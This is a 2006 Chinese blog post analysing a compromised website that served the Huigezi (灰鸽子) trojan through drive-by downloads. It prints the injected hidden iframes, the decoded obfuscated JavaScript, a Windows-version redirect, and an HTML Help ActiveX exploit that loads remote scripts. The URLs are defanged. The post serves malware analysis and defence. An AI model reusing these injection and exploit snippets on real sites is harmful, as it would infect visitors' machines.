2006-04-12 发现一个使用技术升级 下载灰鸽子的网站(第3版)

               

endurer 原创

2006-04-12 第3版 补充:瑞星的反应
2006-04-08 第2版 分析young.gif,确认young.css为灰鸽子
2006-04-07 第1

网站首页被插入恶意代码:

 


 

<iframe src='hxxp://www.***hyap98.com/123/wawa.htm' width='0' height='0' frameborder='0'></iframe><iframe src='hxxp://djloveqq.***go3.icpcn.com/cert/joke.htm' width='0' height='0' frameborder='0'></iframe>

 



hxxp://www.***hyap98.com/123/wawa.htm的部分内容经过escape()加密,unescape()后为:

 

 


 

<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<iframe src="hxxp://www.***hyap98.com/123/music.htm" width='0' height='0' frameborder='0'></iframe>
<iframe src="hxxp://www.***hyap98.com/rx/joke.htm" width='0' height='0' frameborder='0'></iframe>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

 


 

hxxp://www.***hyap98.com/123/music.htm的部分内容经过escape()加密,unescape()后为:

 


 

<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<embed type="audio/x-pn-realaudio-plugin"
src="music.smi"
controls="controlpanel,statusbar" height=95
width=150 autostart=true>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

 


 

hxxp://www.***hyap98.com/rx/joke.htm的内容为(已去掉多余的起始空格):

 



<center><font color=red>对不起,您访问的页面不存在!</font><center> <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>

 

 


 

此网页检查Windows版本,并打开相应的网页windows.htm、winnt.htm或w98.htm。

这与又一个自动下载病毒的政府网站中遇到的相似。


hxxp://www.***hyap98.com/rx/windows.htm的部分内容经过escape()加密,unescape()并去掉多余的起始空格后为:

 



<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<SCRIPT language=VScript src="young.gif"></SCRIPT><SCRIPT language=VScript src="young.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news526" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/windows/help/apps.chm');</OBJECT><OBJECT id="news215" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.***hyap98.com/rx/young.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>news526.Click();f1=1+1;f1=f1+2;setTimeout("news215.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

 

 


 

hxxp://www.***hyap98.com/rx/winnt.htm的部分内容经过escape()加密,unescape()并去掉多余的起始空格后为:

 



<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<SCRIPT language=VScript src="young.gif"></SCRIPT><SCRIPT language=VScript src="young.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news571" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/winnt/help/apps.chm');</OBJECT><OBJECT id="news577" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.***hyap98.com/rx/young.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>news571.Click();f1=1+1;f1=f1+2;setTimeout("news577.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>"

 

function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

 


 

hxxp://www.***hyap98.com/rx/w98.htm的大小为0。

hxxp://www.***hyap98.com/rx/young.css其实是个加过壳的PE可执行文件。


hxxp://www.***hyap98.com/rx/young.gif其实是个利用系统漏洞的网页文件,访问注册表获取IE临时文件夹路径,并利用WScript.Shell复制文件young.css,创建文件c:/wins.bat,c:/boot.hta,C:/wins.exe。

windows.htm 瑞星报为:Trojan.DL.JS.Agent.g

winnt.htm 瑞星报为:Trojan.DL.JS.Agent.h

           

再分享一下我老师大神的人工智能教程吧。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值